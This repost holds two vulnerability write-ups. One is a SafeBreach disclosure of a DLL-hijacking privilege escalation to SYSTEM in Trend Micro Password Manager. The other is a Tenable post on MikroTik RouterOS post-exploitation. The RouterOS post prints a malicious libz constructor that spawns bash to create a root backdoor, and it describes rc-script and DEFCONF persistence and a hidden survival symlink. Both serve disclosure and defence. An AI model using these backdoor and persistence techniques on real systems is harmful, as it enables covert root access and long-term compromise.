Trend Micro Password Manager is a standalone software which is also deployed along with the Trend Micro Maximum Security product. The purpose of the software is to manage website passwords and login IDs in one secure location. Part of the software runs as a Windows service executed as "NT AUTHORITY\SYSTEM," which provides it with very powerful permissions. In this post, we describe the vulnerability we found in the Trend Micro Password Manager. We then demonstrate how this vulnerability can be exploited to achieve privilege escalation, gaining access with NT AUTHORITY\SYSTEM level privileges.

Vulnerability Discovery

In our initial exploration of the software, we targeted the "Trend Micro Password Manager Central Control Service" (PwmSvc.exe), because:

It runs as NT AUTHORITY\SYSTEM - the most privileged user account. This kind of service might be exposed to a user-to-SYSTEM privilege escalation, which is very useful and powerful to an attacker.

The executable of the service is signed by Trend Micro, and if the hacker finds a way to execute code within this process, it can be used as an application whitelisting bypass.

This service automatically starts once the computer boots, which means that it's a potential target for an attacker to be used as a persistence mechanism.

In our exploration, we found that after the Trend Micro Password Manager Central Control Service was started, the PwmSvc.exe signed process was executed as NT AUTHORITY\SYSTEM.
Once executed, the service loaded the "Trend Micro White List Module" library (tmwlutil.dll) and we noticed an interesting behavior: as you can see, the service was trying to load a missing DLL file, which eventually was loaded from the c:\python27 directory - a directory within our PATH environment variable. Stay with us; we will analyze the root cause in the next section of the article.

PoC Demonstration

In our VM, the c:\python27 directory has an ACL which allows any authenticated user to write files into it. This makes the privilege escalation simple and allows a regular user to write the missing DLL file and achieve code execution as NT AUTHORITY\SYSTEM. It is important to note that an administrative user or process must (1) set the directory ACLs to allow access to non-admin user accounts, and (2) modify the system's PATH variable to include that directory. This can be done by different applications. In order to test this privilege escalation vulnerability, we compiled a DLL (unsigned) which writes the following to the filename of a txt file:

The name of the process which loaded it
The username which executed it
The name of the DLL file

We were able to load an arbitrary DLL as a regular user and execute our code within a process which is signed by Trend Micro as NT AUTHORITY\SYSTEM.

Root Cause Analysis

Once the "Trend Micro Whitelist Module" library (tmwlutil.dll) is loaded, it initializes a class called "TAPClass", which, in turn, tries to load another library called "tmtap.dll". There are two root causes for the vulnerability:

Uncontrolled Search Path - The lack of safe DLL loading. The library tried to load the mentioned DLL files using LoadLibraryW. The problem is that it used only the filename of the DLL, instead of an absolute path. In this case, it's necessary to use the SetDefaultDllDirectories and/or LoadLibraryExW functions in order to control the paths from which the DLL will be loaded.

No digital certificate validation is made against the binary.
The program doesn't validate whether the DLL that it is loading is signed (e.g. using the WinVerifyTrust function). Therefore, it can load an arbitrary unsigned DLL.

Potential Malicious Uses and Impact

Trend Micro Password Manager is deployed with the Trend Micro Maximum Security software. Below we show two possible ways that an attacker can leverage the vulnerability we discovered and documented above.

Signed Execution and Whitelisting Bypass

The vulnerability gives attackers the ability to load and execute malicious payloads using a signed service. This ability might be abused by an attacker for different purposes such as execution and evasion, for example: application whitelisting bypass.

Persistence Mechanism

The vulnerability gives attackers the ability to load and execute malicious payloads in a persistent way, each time the service is loaded. That means that once the attacker drops a malicious DLL in a vulnerable path, the service will load the malicious code each time it is restarted.

Privilege Escalation

After an attacker gains access to a computer, he might have limited privileges which restrict his ability to access certain files and data. The service provides him with the ability to operate as NT AUTHORITY\SYSTEM, which is the most powerful user in Windows, so he can access almost every file and process which belongs to the user on the computer.

Affected Versions

Trend Micro Maximum Security / Password Manager 15.0.0.1229
Trend Micro Password Manager Service (PwmSvc.exe) - 3.8.0.1069
Tmwlutil.dll 2.97.0.1161

Timeline

July 23rd, 2019 - Vulnerability reported to Trend Micro
July 24th, 2019 - Initial response from Trend Micro
July 31st, 2019 - Status update from Trend Micro
July 31st, 2019 - Trend Micro resolved the issue and released a new version.
Aug 13th, 2019 - Trend Micro has issued CVE-2019-14684
Aug 14th, 2019 - Trend Micro has published a security bulletin: http://esupport.trendmicro.com/en-us/home/pages/technical-support/1123396.aspx

Sursa: https://safebreach.com/Post/Trend-Micro-Password-Manager-Privilege-Escalation-to-SYSTEM
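The uncontrolled search path root cause above boils down to first-match-wins directory resolution. Here is a small C sketch modeling that walk; the directory names are illustrative, and the "filesystem" is just a NULL-terminated list of directories that contain the requested file:

```c
#include <stddef.h>
#include <string.h>

/* Toy model of Windows' legacy DLL search: walk the search order and
 * load from the FIRST directory that has the file. Returns the index
 * of the winning directory, or -1 if the DLL is missing everywhere. */
static int resolve_dll(const char *const *search_order, size_t ndirs,
                       const char *const *dirs_with_file)
{
    for (size_t i = 0; i < ndirs; i++)
        for (const char *const *d = dirs_with_file; *d != NULL; d++)
            if (strcmp(search_order[i], *d) == 0)
                return (int)i;
    return -1;
}
```

Because tmtap.dll existed in none of the earlier directories, the search fell through to the attacker-writable PATH entry; constraining the walk with SetDefaultDllDirectories and/or LoadLibraryExW, as the write-up notes, removes PATH entries from consideration entirely.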
  25. RouterOS Post Exploitation

Shared Objects, RC Scripts, and a Symlink
Jacob Baines
Aug 15 · 13 min read

At DEF CON 27, I presented Help Me, Vulnerabilities! You're My Only Hope, where I discussed the last few years of MikroTik RouterOS exploitation, and I released Cleaner Wrasse, a tool to help enable and maintain root shell access in RouterOS 3.x through the current release. ><(((°>

The DEF CON talk also covered past and present post exploitation techniques in RouterOS. I roughly broke the discussion into two parts:

Places attackers can execute from.
How to achieve reboot or upgrade persistence.

That is what this blog is about. But why talk about post exploitation? The fact of the matter is these routers have seen a lot of exploitation. But with little to no public research on post exploitation in RouterOS, it isn't obvious where an analyst might look to determine the scope of the exploitation. Hopefully, this blog and associated tooling can begin to help.

A Brief Explanation of Everything

Before I start talking about post exploitation, you need to have a better idea of RouterOS's general design. For our purposes, one of the most important things to understand is everything on the system is a package. Pictured to the left, you can see all the packages I have installed on my hAP. Even the standard Linux-y directories like /bin/, /lib/, /etc/ all come from a package. The system package to be specific. Packages use the NPK file format. Kirils Solovjovs made this excellent graphic that describes the file format. Each NPK contains a squashfs section. On start up, the squashfs file system is extracted and mounted (or symlinked depending on the installation method) in the /pckg/ directory (this isn't exactly true for the system package but let's just ignore that).

Packages contain read-only filesystems

Squashfs is read only. You see I can't touch /pckg/dhcp/lol. That might lead you to believe that the entire system is read only, but that isn't the case.
For example, /pckg/ is actually part of a read-write tmpfs space in /ram/.

/pckg/ is a symlink to the read-write tmpfs /ram/pckg/

Further, the system's /flash/ directory points to persistent read-write storage. A lot of configuration information is stored there. Also, the only persistent storage users have access to, /flash/rw/disk/, is found in this space.

The storage the user has access to, as seen from a root shell and Webfig

While all of the system's executables appear to reside within read-only space, there does appear to be some read-write space, both tmpfs and persistent, that an attacker can manipulate. The trick is figuring out how to use that space to achieve and maintain execution.

The other thing that's important to know is that users don't actually have access to a real shell on RouterOS. Above, I've included a screenshot where I appear to have a root shell. However, that's only because I've exploited the router and enabled the developer backdoor. This shouldn't actually be possible, but thanks to the magic of vulnerabilities it is. If you aren't familiar with the developer backdoor in RouterOS, here is a very quick rundown: since RouterOS 3.x, the system has been designed to give you a root busybox shell over telnet or ssh if a special file exists in a specific location on the system (that location has changed over the years). Assuming the special file exists, you access the busybox shell by logging in as the devel user with the admin user's password. You can see in the following video, I use HackerFantastic's set tracefile vulnerability to create the special file /pckg/option on RouterOS 6.41.4. The existence of that file enables the backdoor. After I log in as devel, delete the file, and log out, I can no longer access the root shell.

Okay, you know enough to be dangerous. Onwards to post exploitation!

The attacks are coming from inside SNMP!

The snmp binary (/nova/bin/snmp) is part of the system package.
However, there are various other packages that want to add their own functionality to snmp. For example, the dhcp package. In the image below, you can see that /pckg/dhcp has an /snmp/ subdirectory.

Functionality added to snmp by the dhcp package

When the snmp binary starts up, it will loop over all of the directories in /pckg/ and look for the /nova/lib/snmp/ subdirectory. Any shared object in that subdirectory gets passed to dlopen() and then the shared object's autorun() is invoked. Since the dhcp package is mounted as read-only, an attacker can't modify the loaded shared object. However, as we've established, /pckg/ is read-write, so an attacker can introduce their own directory structure (e.g. /pckg/snmp_xploit/nova/lib/snmp/). Any shared object stored there would be loaded by snmp.

One of these things is not like the others

It's pretty neat that an attacker can hide within a process that lives in read-only space! But it's even more useful when combined with a vulnerability that can write files to disk like CVE-2019-3943 or CVE-2018-14847. I wrote a proof of concept to illustrate the use case with CVE-2019-3943. Essentially, an authenticated attacker can create the /pckg/ directory structure using the vulnerability's directory traversal.

https://github.com/tenable/routeros/blob/master/poc/cve_2019_3943_snmp_lib/src/main.cpp#L204

Once the directories are created, the attacker needs to drop a shared object on disk. Luckily, CVE-2019-3943 can do that as well. Obviously, a real attacker can execute anything from their shared object, but for the proof of concept I create the 6.41+ backdoor file directly from a constructor function.

https://github.com/tenable/routeros/blob/master/poc/cve_2019_3943_snmp_lib/shared_obj/snmp_exec.c#L4

The PoC will even stop and restart the SNMP process to ensure the shared object gets loaded without a reboot of the system.
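The dlopen()-then-autorun() behavior described above is ordinary dynamic loading. The sketch below shows that exact pattern on Linux; since building a plugin .so here isn't practical, it resolves cos() out of the stock glibc math library (libm.so.6) instead of autorun() out of a dropped shared object - the mechanism is identical:

```c
#include <dlfcn.h>
#include <stddef.h>

/* The plugin-loading primitive snmp relies on: open a shared object
 * and resolve an entry point by name. In snmp's case the path would be
 * under /pckg/<pkg>/nova/lib/snmp/ and the symbol would be "autorun";
 * whatever that function does then runs inside the snmp process. */

typedef double (*entry_fn)(double);

static entry_fn load_entry(const char *so_path, const char *symbol)
{
    void *handle = dlopen(so_path, RTLD_NOW);
    if (handle == NULL)
        return NULL;
    /* Deliberately never dlclose()d, just as a loader that intends to
     * keep the plugin resident wouldn't release it. */
    return (entry_fn)dlsym(handle, symbol);
}
```

(On older glibc you'd link with -ldl.) Nothing in this flow asks where the .so came from or whether anyone signed it, which is exactly why a writable /pckg/ entry is enough.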
Since /pckg/ is in tmpfs space, the directory structure the script creates would be removed on a reboot even if the PoC didn't delete it.

I'm in your /rw/lib, executing as one of your dudes

Similar to the above, I found that I could get system binaries to load libraries out of /flash/rw/lib. This is because /rw/lib/ is the first entry in the LD_LIBRARY_PATH environment variable.

Load libraries from read-write space? What could go wrong.

The great thing about loading libraries from /rw/lib/ is that, because it's persistent file space, the shared object will persist across reboots. The only challenge is figuring out which library we want to hijack. The obvious choice is libc.so since it's guaranteed to be loaded... everywhere. But RouterOS uses uClibc and, quite frankly, I didn't want to deal with that. Thankfully, I came upon this. Hello libz! /nova/bin/fileman loads libz. fileman is the system binary that handles reading and writing from the user's /rw/disk directory via Winbox or Webfig. It gets executed when the user navigates to the "Files" interface, and it shuts down after the user has navigated away and it has remained idle for a minute. To compile the malicious library, I simply downloaded libz 1.2.11 and added this constructor to deflate.c:

void __attribute__((constructor)) lol(void)
{
    int fork_result = fork();
    if (fork_result == 0) {
        execl("/bin/bash", "bash", "-c",
              "mkdir /pckg/option; mount -o bind /boot/ /pckg/option",
              (char *) 0);
        exit(0);
    }
}

You can see, once again, I've just chosen to create the backdoor file. For this proof of concept, I cross compiled the new libz.so to MIPS big endian so that I could test it on my hAP router. Once again, the proof of concept uses CVE-2019-3943 to create the "lib" directory and drops the library on disk. However, unlike the SNMP attack, /rw/lib/libz.so will survive reboots and it actually gets loaded quite early in the startup sequence. Which means after every reboot, the backdoor file will get created during start up.
Signature verification matters until it doesn't

One of the more interesting things stored in /flash/ is the files in /flash/var/pdb/. "Hey, aren't those the names of all the packages I have installed?" It turns out that this is where RouterOS stores all of the installed NPK files. Oddly, as root, they are all writeable. I can tell you from experience, you don't want to overwrite the system package.

Haha! Did I just get you to watch the system rebooting over and over again?

When I learned I could break the entire system by messing around with the system package, I got kind of curious. What if I was a little more careful? What if I just overwrote the package's squashfs filesystem? Would that get mounted? I wrote a tool called modify_npk to test this out. The tool is pretty simple: it takes in a valid MikroTik NPK (e.g. dude-6.44.5.npk) and a user-created squashfs. The tool removes the valid MikroTik squashfs section and inserts the user's malicious squashfs. In theory, modify_npk generates a perfectly well-formed NPK... just with a new internal squashfs. The problem is that MikroTik enforces signature verification when installing NPK packages. If you try to install a modify_npk package then RouterOS will flag it as broken and reject it. See wrasse.npk in the following log file:

I'm not broken, you're broken

Which is obviously good! We can't have weirdos installing whatever they want on these systems. But what if we install it ourselves from our root shell?

Don't feel bad. I didn't know echo * was a thing either.

In theory, RouterOS should always run a signature check on the stored NPKs before mounting their filesystems. Since they are all read-write, it only makes sense, right?

Oops

In the above image, you can see wrasse was successfully installed on the system, bad signature and all! Obviously, that should mean the squashfs I created was mounted.
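At its core, modify_npk's operation is a section splice. I won't reproduce the real NPK header layout here (see Kirils Solovjovs' format graphic mentioned earlier for that); the sketch below instead uses a hypothetical container of (u32 type, u32 length, payload) records on a little-endian host, purely to show the splice itself - walk the parts, copy everything verbatim, and swap the payload of the target-typed part:

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Generic type-length-value splice (NOT the actual NPK wire format).
 * Copies every section from in to out, replacing the payload of any
 * section whose type matches target_type. Assumes a little-endian
 * host so the u32 fields can be memcpy'd directly.
 * Returns the bytes written to out, or 0 on malformed/oversized input. */
static size_t splice_section(const uint8_t *in, size_t in_len,
                             uint32_t target_type,
                             const uint8_t *new_payload, uint32_t new_len,
                             uint8_t *out, size_t out_cap)
{
    size_t ip = 0, op = 0;
    while (ip + 8 <= in_len) {
        uint32_t type, len;
        memcpy(&type, in + ip, 4);
        memcpy(&len, in + ip + 4, 4);
        if (ip + 8 + len > in_len)
            return 0; /* section runs past the buffer: malformed */
        const uint8_t *payload = in + ip + 8;
        uint32_t out_len = len;
        if (type == target_type) { /* e.g. the squashfs section */
            payload = new_payload;
            out_len = new_len;
        }
        if (op + 8 + out_len > out_cap)
            return 0; /* output buffer too small */
        memcpy(out + op, &type, 4);
        memcpy(out + op + 4, &out_len, 4);
        memcpy(out + op + 8, payload, out_len);
        op += 8 + out_len;
        ip += 8 + len;
    }
    return op;
}
```

The result is structurally valid but no longer matches the signature over the original contents, which is exactly why the installer rejected wrasse.npk and why skipping the re-check at mount time was the actual bug.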
┬┴┬┴┤(・_├┬┴┬┴

Of course, just having the malicious squashfs mounted isn't the end, because the filesystem I created actually contains an rc script that will create the backdoor file at startup. This is quite useful, as it will persist through reboots. Although, users can catch this particular attack by using the "Check Installation" feature. MikroTik silently patched this bug in 6.42.1. I say "silently" because I don't see any specific release note or communication to the community that indicates that they decided to enforce signature verification on every reboot.

RC scripts everywhere

RouterOS uses rc scripts to start processes after boot and to clean up some processes during shutdown. The OS has a traditional /etc/rc.d/run.d/ file structure, which we will talk about, but it also has (or had) other places that rc scripts are executed from as well.

/flash/etc/

As mentioned, RouterOS has a traditional /etc/ directory, but since the directory is read-only, attackers can't modify or introduce scripts. However, RouterOS does have a second /etc/ off of the persistent read-write /flash/ space. At first glance, it doesn't appear all that useful as far as rc scripts go. However, as BigNerd95 pointed out in his Chimay-Red repository, you can create an /rc.d/run.d/ subdirectory off of /flash/etc/ and any rc script stored within will be treated as a normal rc script on startup and shutdown. In the example below, you can see I create /flash/etc/rc.d/run.d/ and echo the script S89lol into place. After a reboot, the script is executed and the developer backdoor is created. This behavior was removed after 6.40.9. Up until then, however, this was a very simple and convenient persistence mechanism.

/rw/RESET

RouterOS has a bunch of scripts sitting in /etc/rc.d/run.d/, but there are two I want to specifically talk about.
The first one is S08config, because through 6.40.5 it contained the following logic:

    elif [ -f /rw/RESET ]; then
        /bin/bash /rw/RESET
        rm -rf /rw/RESET

Meaning that if /rw/RESET existed, S08config would execute it as a bash script at startup. This is an obvious persistence mechanism. So obvious that it was actually observed in the wild: https://forum.mikrotik.com/viewtopic.php?f=21&t=132499#p650956

Somehow this forum user obtained MikroTik’s debug package and was able to examine some files post-exploitation. Here we can see the attacker using /rw/RESET to execute their /rw/info binary. Perhaps seeing this used in the wild is why MikroTik altered S08config’s behavior.

/rw/DEFCONF

Similar to /rw/RESET, the contents of /rw/DEFCONF can be executed thanks to an eval statement in S12defconf:

    defcf=$(cat /rw/DEFCONF)
    echo > /ram/defconf-params
    if [ -f /nova/bin/flash ]; then
        /nova/bin/flash --fetch-defconf-params /ram/defconf-params
    fi
    (eval $(cat /ram/defconf-params) action=apply /bin/gosh "$defcf";
        cp "$defcf" $confirm;
        rm /rw/DEFCONF /ram/defconf-params) &

This was first introduced in 6.40.1, but unlike /rw/RESET, it hasn’t been fixed as of 6.45.3. In fact, this is the method that Cleaner Wrasse will use to establish reboot persistence on the router. I wrote a proof of concept using CVE-2019-3943 to show how a remote authenticated attacker can abuse /rw/DEFCONF to create the backdoor and establish persistence.

/pckg/

As we saw in the signature verification portion of this writeup, each package off of /pckg/ can have an /etc/rc.d/run.d/ directory containing rc scripts. /pckg/ is part of a tmpfs, so while anything an attacker creates in /pckg/ won’t persist across reboots, new rc scripts will get executed at shutdown. How is that useful? One thing I didn’t mention about /rw/DEFCONF is that its existence on the system can cause issues with logging in.
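To illustrate why the S12defconf snippet is abusable, here is a hedged sketch of planting a /rw/DEFCONF payload. The key observation (my reading of the snippet, not stated verbatim in the source) is that $defcf is the file’s contents and is expanded inside eval, so eval re-parses it and any semicolon in the file separates out a new root command. RW is a stand-in prefix so this runs off-device, and /pckg/option is an assumed backdoor path.

```shell
#!/bin/sh
# Sketch of /rw/DEFCONF abuse. S12defconf does, roughly:
#   defcf=$(cat /rw/DEFCONF)
#   (eval $(cat /ram/defconf-params) action=apply /bin/gosh "$defcf"; ...) &
# eval re-parses the expanded string, so shell metacharacters inside the
# file's contents execute as root at boot. RW stands in for /rw.
RW=${RW:-/tmp/rw-demo}
mkdir -p "$RW"

# The ';' terminates the gosh invocation inside eval; everything after
# it runs as a separate command. The payload just recreates the backdoor.
printf '%s\n' 'x; touch /pckg/option' > "$RW/DEFCONF"

cat "$RW/DEFCONF"
```

On a real device the file is consumed and deleted at boot, which is exactly why Cleaner Wrasse needs the shutdown-staging trick described next.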
Cleaner Wrasse avoids this issue by staging a file at /rw/.lol and then creating an rc script in /pckg/ that creates the /rw/DEFCONF file on shutdown. That way, Cleaner Wrasse avoids the login problem but ensures /rw/DEFCONF exists when the system starts up again. Simply copy /rw/.lol to /rw/DEFCONF on shutdown. Easy mode.

The symlink of survival

Many of the proofs of concept I mention in this blog use CVE-2019-3943, but it was patched for good in May 2019 (6.43.15 Long-term). Unless you use Kirils Solovjovs’ USB jailbreak, there are no more public methods to enable the backdoor file and root the device. So how am I able to do this?

[Image: “Root shell on the most recent release: 6.45.3 Stable”]

The answer is simple. When I was still able to exploit the router using CVE-2019-3943, I created a hidden symlink to root in the user’s /rw/disk directory.

[Image: “The .survival symlink points to /”]

After an upgrade, you need only FTP into the router and traverse the symlink to root. From there you can achieve execution in any of the many ways you want. In the following image, I drop libz.so into /rw/lib/ to enable the backdoor.

RouterOS doesn’t offer a way for a normal user to create a symlink, so you can only do it via exploitation. But RouterOS doesn’t try to remove the symlink either. As long as that’s the case, we can continue using the survival symlink to reestablish the root shell after an upgrade.

Neither Winbox nor Webfig displays hidden files. It’s probably worthwhile to occasionally check your user directory via FTP to ensure nothing is hidden there.

[Image: “Not pictured: .survival”]

So what happened here?

I’ve shared a bunch of ways to achieve execution and generally hang around the system. So I was a little confused when I stumbled across this:

[Image: “y u no opsec?”]

The above image is from the first public report of CVE-2018-14847. Before it had a CVE. Before it was even known to MikroTik.
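The staging dance described above can be sketched as a shutdown rc script. The PCKG and RW prefixes are stand-ins so the sketch runs off-device; the package directory name “lol” and the script name K92lol are made up, though /rw/.lol is the staging path from the writeup.

```shell
#!/bin/sh
# Sketch of Cleaner Wrasse's shutdown staging. An rc script under a
# /pckg/<name>/etc/rc.d/run.d/ directory runs at shutdown (per the
# writeup), so it can copy the staged payload into place just before
# reboot. PCKG/RW stand in for /pckg and /rw; "lol"/"K92lol" are assumed.
PCKG=${PCKG:-/tmp/pckg-demo}
RW=${RW:-/tmp/rw-demo}
mkdir -p "$PCKG/lol/etc/rc.d/run.d" "$RW"

# staged payload; safe to leave here, since /rw/DEFCONF itself would
# interfere with logins if it sat on disk between boots
printf '%s\n' 'x; touch /pckg/option' > "$RW/.lol"

cat > "$PCKG/lol/etc/rc.d/run.d/K92lol" <<'EOF'
#!/bin/bash
# runs at shutdown: put DEFCONF in place for the next boot
cp /rw/.lol /rw/DEFCONF
EOF
chmod +x "$PCKG/lol/etc/rc.d/run.d/K92lol"
```

Because /pckg/ is tmpfs, the K92lol script itself vanishes at reboot, but by then it has already done its job, and the boot-time payload can recreate it.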
A user popped onto the MikroTik forums and asked about a potential Winbox vulnerability after finding an odd login in their logs and suspicious files on the device. Pictured above is a portion of a bash script they found called save.sh. I’ve shown in this blog post, over and over, that an attacker needn’t store anything in the only directory the user can access. Yet that is exactly what this attacker did: /flash/rw/pckg/ is a symlink to the user’s /flash/rw/disk/ directory. How is it that someone who had a zero-day that would later be used against hundreds of thousands, if not millions, of routers didn’t know this simple fact?

Thankfully, they did make this error. Not only is CVE-2018-14847 pretty nasty, but the resulting fallout has forced MikroTik to do some hardening.

Is all this fixable?

Of course! Almost everything I’ve talked about here has been fixed, can be fixed with minor changes, or could be fixed just by moving away from executing everything as root. Defense in depth is important, but sometimes it just isn’t a high priority. I don’t expect to see any significant changes in the future, but hopefully MikroTik can work some minor defense-in-depth improvements into their development plans.

…or maybe we’ll just wait for RouterOS 7 to be released.

Tenable TechBlog
Learn how Tenable finds new vulnerabilities and writes the software to help you find them

Written by Jacob Baines

Source: https://medium.com/tenable-techblog/routeros-post-exploitation-784c08044790